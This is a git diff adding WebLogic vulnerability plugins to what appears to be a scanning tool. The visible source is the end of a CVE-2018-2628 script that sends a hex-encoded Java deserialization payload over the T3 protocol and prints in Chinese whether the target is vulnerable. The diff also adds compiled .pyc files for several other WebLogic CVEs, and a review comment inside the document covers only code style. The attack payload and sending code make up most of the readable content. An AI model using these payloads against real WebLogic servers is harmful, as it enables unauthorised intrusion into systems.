payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + time.sleep(2) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + 
except Exception as e: + pass + return res + +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + # pass + # print (u'目标weblogic未检测到:{}'.format(VUL[index])) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) + +def run(dip,dport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (dip, dport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,dport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + #print 'rs',rs + checkVul(rs,server_addr,index) + +if __name__=="__main__": + # dip = sys.argv[1] + # dport = int(sys.argv[2]) + # run(dip,dport,0) + rip = '127.0.0.1' + rport = 7001 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/__init__.py b/plugins/weblogic_poc/__init__.py new file mode 100644 index 0000000..f021474 --- /dev/null +++ b/plugins/weblogic_poc/__init__.py @@ -0,0 +1,10 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' 
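Review bot: The `__main__` block keeps the argv-based entry as commented-out code (`# dip = sys.argv[1]` …) and hard-codes `127.0.0.1`/`7001`, which leaves `import sys` unused and disagrees with CVE_2018_2628.py, which still reads `sys.argv`; the two scripts should use one convention and commented-out code should be deleted rather than kept. `t3handshake` assigns `data = sock.recv(1024)` and never uses it — `sock.recv(1024)` alone is clearer. `checkVul` likewise carries three commented-out print lines. The `VUL`/`PAYLOAD`/`VER_SIG` assignments are garbled in this view (the text after `import sys` is mangled), so they could not be checked here.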
diff --git a/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..0a165d6aab2af4c7c778bee910ebed1d8bd379d1 GIT binary patch literal 4462 zcmeHL?Qayv8K2#Izw_C~QGt|#j;0mZiuZg6G+>7^s($F6 zW}ex3=6RWCW}f-&?Tg2w2%am+E7{l52>q46G#?){_Cj&?K&7D!(gaO3gpA-(F(U%? z8NR$f;}?+T*8;ynnE(!I!3B{F;(!*?!b>7>#7Wc}Q6d6D(S!_7qW;urv*whuT5LYZ zV@4~yk>wn@lBfWw*IVUYcmrlOnSd_NhKdgX0zwtwClm5AGVAMLK#XtvWu7uX1N*LO4 ztz#wX##TDCIM|3U30K8RT#IOkYXIGG@Gf47xBTn`KRew{t!pJ(f%X!g4T25RJ+b&> zcUvNrmeNuxIy^a;-mxQkaBMKOD>^Q@*(Zfdv-ED)(WWnh-`ezBorZf25z(6V* z)sY{e!h5jm5Q>cpSYY>8|DgXRgxK$nLu37j#Lm+9>GfUo482G1R8@9;gf6j<`||Wn zcAnj!ce>~@5z7uiB_foFSh7K^14?t*pos)zd(W4%g6z-W4ZX>3p#bRFcoNSV*1WDt z0hvq*=Ot)m?_x={h%eFTKT+XO1kM{Vk(AoSWy?0 zc|2;)S?oIdZkb+J$vz1|D|yi<{3Xy9lC)DWC4%P+th$n7nwG1$ASDgAnxkgX zQoYWDim4fx9A&SvdtKjQ7ha~mFejL?nzMA?KnW zwkdARCHa`!+!zlAf{oB;k$Fk66*Y&Y`pP;$4ITuTyd&imTN+aq%ixR2uF+-s3cXzJ zrprEVF*K*Bu0_f&dUg!-Bvp7(oT8gp zYf~`5&e4nP=GH}e(GN49L2k?<`6x{e#`DJoT{+bcZ$e2g97?6nTPN`HPg1s8t(9;Hjdq#rA;XL zFF&6%Fyyd8l>8K&0Z`M^uBLekU@02vC2z|&)YCWE>&NJoZl~91##?kzbRN5nd4pU- zUtO-QkN$owyGU=d3+&gKM=J#vS_CBP?iTn-*aR^XA)eij;#p5BbcOwaez0?Kh<>!s zGhFnBd&g(3C%S=)+N~z&4(eVgpQN}xqvj$3g_Yz=H#C%fApni!MsKk#>P`W zZAJht<)>}Pe2IQFu|1L61((&2c1r0T+oaUC0T=mk39BtH1a9LQ&&C?qsck!F6f*fd zCOzzZx>R$!P-3eW}e30y~q8g7r(#%=h~42d%T0(GQ=YXw`3>5 z238#05LlgW8XIs1^+4?TJ<9bBJNwEmcT}9&_mw`hIs0Ej2Ygn6$It-ud=U)-!bzNGkoDG$5s<6pFRsL3(XB zy~FOp06^6nUR(_Vzy7TOR9dj@8+o-+pr`lt(9_%L{e8tY#~%3t=c*~Ej`@l>_9s}^)DbpgAz(C`6ybYlNhEjD>*wPmWjCl zzyUv+^KLE^0xENlL?;C$T?^StncpI{FzB=aC*d22d=I?*XXg3AtX)=f3d#4|#Nt>f zJJCO`YXI0!Dg;leiurhlZ4~Bp)5$hZy=+@*c4T_LoE}K+khkyLk(TUo%|{9*|3Y^9 zph7~o5Ei1M9}3hy_=)Squ-M`25a7qDFCj*Ss6aTpsD))Y4@g#)7aO?(vW5O4z=z&Y zEhNjDrOGnl-`-@6H+)t%6-U)|FZeALCZH=A$EVs>ZS*8|=Pj*Z;640b6^DNw`oY04 KxDxIS3;zNo!?n8r literal 0 HcmV?d00001 
diff --git a/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..e769ce239ca1ce29ef9a6fabe6f1cfefd8cebb56 GIT binary patch literal 11024 zcmeHN-ESR772myIzINgyO+#Ct6jO*=)5hM}+0Uv1OcS7`b*d&Lt#NhP-I-0?*w^mf z>ogzN2q{P)K2)CgC>7Y^1&}~Izyqj%2-;Vapgh4dPyEiz-Rt}1B(zNL8&*Dx`D(V$eB~>`pp~Nzk zG&(aKJoNqX#w^}YxI90DEGov0s^Eb}9hA?{G`@lN$I!mGQz;6U=W$cTxKYOZ%)B1y z>6yn>C)8f|g1Z_CV^NZdmoeNjD13TmifCAFAmhnKr!m)P%oq0#@)Uu%b&F9->8YDo z4P)`j^fPBp9J4Lv9kVF~`iba|(9)rV{UQNb&wPmli#QK0H)W%x*HnXK2 zS&@_a0SkN{bg2kIg-hdj31$bLsa3Pa_9sz8fCBUucu^9%Se7_+q!q-fH(GPW`riDQ z7tnlccl>;mTzLhjF+ZXhoWshng7Z$GX75lf-|o#CYwSxJtSisadt6&VGJzEZul>jm zA&n#>Qo5lN*rD`8W?|)cZ)PA9bQQ7?s#zvzttBi~tqTdG`Sf-a)S|GD?{UxWj@l9Fg>{M*W}EE>JqqMq{;$Ym+uqyA)cEcH-!@tD)|K+!neb zCcQ9z^#Wf8Y3jv(>?eur>O8LG)`jL}WDT^OGUSfeQG+^HY3&$oNwYh!AF1a!kT~c? zyzi~KyH=ETna^WI0eW#^g_Ok*pdT9xeW+c->^-UBq~B4CceR3&{~_x8ZNPxV2(3iA zL6|aVO*{0G5m~lr4pyWrhBLUrz8-0ivi_0!D2rk+#E)bWC&G=!>={dq6Y6pLd5KZF znw=@_4r**)OJUb0b?rV2z;)Q}!ZsE-MR7Q?Qdl|;ZH4{Iff~r-D(i&4di{foMH*VM zmnN-7mksMWnyV@INM9;TMbfuhYY&?&B!o@d zREA9Wu>%uFWA)o?y&r6)Q+BDt0P0 zN6f&q92*Lb1WGA5Ai@|qAek_E=p-q|Cec*+QIc}zr-9{JfeUy!B(#iML%{z12Sxqc z`$OZ>ZyE;#v)>)Lt#Q$+^X?lLY#_Cn#yT-D#39Kbj#WJVjM(S{Ci@ zQEVLGUu+!mkKyD|$JjK;affoyDd|Ojw=K4m_Ud%&T`x#N{n*$Qfgeg{LleR2O_=4t zyH*=PdyaR{vjUyA*rl^KN3L{`(nQ_)Awocm>{ko7_uz&&zH6I_Kf7KpaYgg?j>Z+R zU$Fxx4P50M*nvDXZSkSakc?dN-4W*?)dWwS)`v8D$Qg$Tvn7Z3r~bQ&nYzH`Nd!Ye zzrY1LbL8#^SB}0Ru8@G&_G^3FE8ChG|gBs5Z;@uq6$0_R5;ftF2WjH}Xm*lZ&$@R9R0h0ZU66-~k9FJ(bILq~e|7-r9=j*-Qo~=d`$Z jGq8=|b)zGH5c zMP&<-%B||9&vZ(ia;MU%o~s-;UOlo^qb2Foup~9TB(Hz=tf7`=qPH0J#RUW7E75Qh z4mw=~z=kd@IG&1L$%sUdE(Qz{av-$8iCiy@oXAJu451J=U?M`)#*IS@0UQ~pi3dd* zhB3TwrOF`PO1m(1S4LI$i8a-i+6&z@JuoP+Lhsitxn*t3OQofD#-Qm1svL*HK=h(vm6d!hpFx0$U-XlSSMR`VTtD8SS}0jsm1gMw%dnjhzjU z0;L49FOv zS)4p!!jATNzz}EYksc#l4z!7oCL&V>^ZXzqck3qIW~+HEUC-8{c1G@3MovLS-a$sr 
z!|X&xUp?g2Y-2rZ<9mgu9Wni|^@Hn&lbb?0IQlkCjgG{dE34u(e@VW+DO>H6F*!RA zp`=Bwh+$UXmsIdOY#uSQ`;pW0PKXj3S9vEtLV~;#_#mcl&{LG?Dd3-M8*Q^wx@L;% z#|=??(AdFST6%zL8QZA2T^8_2luuIMDqnu|(!=m$47iVzJJeUXUEQvUDJp;cxwFPu zqxopXXir?2%D!hBTNTr|QaKCPQXu`!%FD(pMzi#?(J8~#+_$)Jh7=p*sfb}}j{pnR z^^I}%&nOQF3tpPqER^c^Ns0xb*gBk6s#9D@Q?N7`-Z-kJvdG<-v9M0xmCq?&=_P&5#5vqpI2a8>t!;3KVeVjN4 z7EV4=NFsT@oG=g0Fe&n*{Q!7dh&dBZf^?!a&hE&QRM?1&H2sS_3XiMO?wQ?SDfA3H zH~cZe;EBwwzuFk_w-)}2xXXA;GVW8IK1%{13n)vG`>uoS4mhRV&r8Tn#`Y2-i6e4{ zIKuK)ylZX9bpY=$@qtf*Fpdtw>5wEHdntz-u01)mq?{ZoLuzn52~W(naWd!% zL^KeV>$7eEq!frC1!2)S>|SG!Lf!rYL!89Wkqa#(4p6}bxZC)ACUB#`4x-e@*G+N% zs2ocL8^{#L=x|FPVUuv6CmVsXF_d6l>JW^^fap+r%#{KTGxg&(<@%8hLqDHv8<;B-QU3 zseJOpr9^JDSJs=eRc)^-WT^6qjp*{~dL;64CR@2FhYi$03gn%*xUveG9P z!;NfH9luAEg({gP^8l>WA^fw4QJO&WtBdIF1udV$OB->qHtfzv5wvU@ua$SourZZR z85YXCP|2Kj6*0D2dxC20nAc!;nun2B9?Vn0%*tX$(Z@}Sg?{~sSO5O=-{08&P7(jR z{=1)EfBVsv z_WW!mBkpAQfDVOdB`@XX#xPgw$$6PvIJ3Drk80fzkRF>2y zkrWdyE#4#~F*}*pC?+f0`NYDP8qY4CIGyi1b@G|7Hcp*>>BPbd`BY1`DU!Rs*;bKK z1xVCt=Myh3yz>0Xh2x5R1cJ-i%0_k{I?X;!H|k!qq?EOWnNiL*n?5RZAdl zzC$%KTInH@6{WrYo6(v?2TxKxMK%SZhY77ey|ykkSLNquI;}@=(_5fks)5>?S+CV6 O>j&!f`cz$kwtoZiNGyy1 literal 0 HcmV?d00001 
diff --git a/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..fff3108bd1424ff910aa6044014b8042388709c9 GIT binary patch literal 11041 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 literal 0 HcmV?d00001 diff --git a/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..e9debdff1b10d3783a4f9c2b2a39036586bd8c1b GIT binary patch literal 2528 zcmahLU2oe|)Yo=Cnzidd&@m9m1TmJbiPLTEMw=GevVjn*CbjztLB{pHOWZoPckfM; zS`I=Q5|d!;Z6KJSgBL&o@c=Jqzr?SoMSJ3XPn_!{ZPUSaU7vIB`99|!pLBj`C?mm| z(7&tH2PEk)apYCYlkg_VrC{3 zn~LBVp%wz_z+*-ZPQa|_8ju7VfDi!$N+Ixd&G-<`uYrCK3NA1!I)IoBKoE3I?|3R{ z$6_Nwzhebp>@}ITxU5YU#-}wnPoA3AS_07Zsfo!#F{iyvtTj(R zQ5-MA-?(;Od5pOEi%ao-0`~FdWH1tY0dvz<&7_R*nTyNk@@H~tkh#bR&CgYd z%cJC+Wf7kT!yTM|&vdH|vr2-&1<&Omkzd~Mi3QCOFVTsjPZ!{2-vbDxP3XpZh&_$v zP&zENC9H(fT9Rf%=)}|FoM@wsB1fyh50U6huHf{oL|YE!Rkbbi#AXr?gz`OkGletv zP+Pt%xkpurr`IwxL{eKpQjo?61RcZERz6a$NLM9Sz9QklP+m*2FYu7S^bS7QRzr13 z!oyuGiQZm})Eei0kP>i8*B>H1cu{XUEZ<}%*B3mGV%s&jM=yAki+s(O6!A5P24bG+ z6L)>;th-Je&nFsG)MZm$@=UgClUX%VH(3F=f>rQnRTmo_bYnd|I~yC^WAYthVnTal zU^G3tHgy?5T>BR9`V!D)zjeZE9-hfEZc?7r`-Mt+=OXt~OM3r(m-PMp z)RTrdyItMif;-JV@8ONE$6eXp7tpbC?tz#EIWQnk3d zS&*%iu9*#ocP_LtTNtgBDtaG@it!Rj!K-^EXaBD`gM)oy#l{S1zkmFLzrXo)d-KyK zS#i9oZEgMX)z;k~-<`WOw{`p0)}ObxZhpD-`JL_ix3_=)_MiJ-FI+mChv|Gee{!NY z*%%cT^7|}o-~D;}hmW`a_-yOuZ++sqfhZH-3TxWD7Nse<-XM&#NcBC&qlCyD4r2aB zG9^)x5tCZAC{d+e!;c2ew#3MVk)KOMN`pG(w9qr4K*ARDJ(rOPfgT*7a6d`(2*mfW z{MJ;(-w?yRp7*IIzT?Vb{=AK`Lz?jQFIlGhD8Y9cRoi8iUR?~|vnr5|A+k3__62_< zQh+)FPM8KjLK&16&km1I+=ja; literal 0 HcmV?d00001 
diff --git a/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..043f80f31567dfeb2acf45a122477718e7af2509 GIT binary patch literal 7184 zcmeHM+ix6K8K2u;ypD5gxJ0djRkgIHbv-j@u2lpzO@NlxiIU*7uB&Bc&Y8r?X4jcr zr%tkqkb*?Tt#4dP1-9S;DuH-_2T))7U!ZwK4$2enJn{R^?5x+9HbtnZ5X^ecIdd-G z`ObH~yT3d&)ll#>=6<=n_=uwXjXui9K;t>Q-5;Ug%96rWuC>%9Ro2>)CTo33m$k8E zaQ%|HRN)57DzBid@hY!Z8TL4FAJ0Wrl7U)8ej3GK>3 ze&o2abVwYQ?W4z)JL=LAaX=grN4R=NR~4?ES7siHCRCt3-NZ9pJVjlWRMXICm?p`= zMxPqXG}7!(_fZw)lg$}?VQ_hF8eKGuf~KItqCUpwrkmfy_Y+uOmNbgN_tr)UdDFI!0_aBgK$`GqT}gizxhnFIaii_^hpF!42LmF z?Z!Rakg{-V>iNafv$kmkv$kgk^UrCD5+#D0rs?|3rm(zX=?Erv1hj3KsS|nvIHn%k#?uKT1`h4)+bqV8CQgh! z?0rt^Gnxe$D1jrv=fKkOTqpHx;2^QT|2{;_vB#EYGKcipKFf&0A8lWbbHz?*nV>3T zmM|IZAy0%Op&7X@s2$4lgUS+r5B-8!%w(WCvzg0qv#4zrpmrq)(~8}YV9Cc4A_~p8 z{M^6xgIiO}kDbjr>o;FBXT#T@O2AU`p}KyfUb)Ki1d!df(_*E*Ynk*N+XVbS3>N zuB2LA$@MQ>ROGePMwd}vcwfQ(k`LU3K`LF-N_Ra4mv|A?A|j@v#{yS{%#U$Xk?WQwkY&qDNLQj}UW^i0k@g`H z3MeL<2|o@ZVTmM^Iwo*Pj!A1-&{mi*`leOocS5=sSSPfX=M#MF$h=~8Jkmy_N!)UG zmnbPQ^SBSf0ft5A9a~K&4FQwJ6VN6ERMNZ9;g-F>4tJra07>G(VyX3`5d`RA;OEd@ zK5oeufY0Qdczg~<8NNZi?OBCZEcNbx#Vt##Q=X)} z2ap|-eByk05}5rMJ<_N6pOl)C-h-3H|3DV@mAQXQw^-2`ot%I%CH#N2K*sh#8`DxPASlA_ zA8ss*Irmcw?jE&Z!n@nwF=Bf~7{;M=jNs%s+zB0rCr+5aJK>1#EI4>$P7vG;Te@7p ze*EF&$QO=2^JH*R1}gCUEE`@#=m?uT7UUlrKr2|T>)6b4;g7*>a=jp6%n1@+dY{r` zyloD4xvKa5^n;J@@Z?-tL>@clrhlt?`&rXjALO64;2GP5Fh_Lb6fqA7;^Zd~{S<_7 z8NAKFW85m^b$FE-gi^UjG1p8bucn>sTGY!Z9>^##$S7{eCTO&lO`^&xe6^GHP({7S 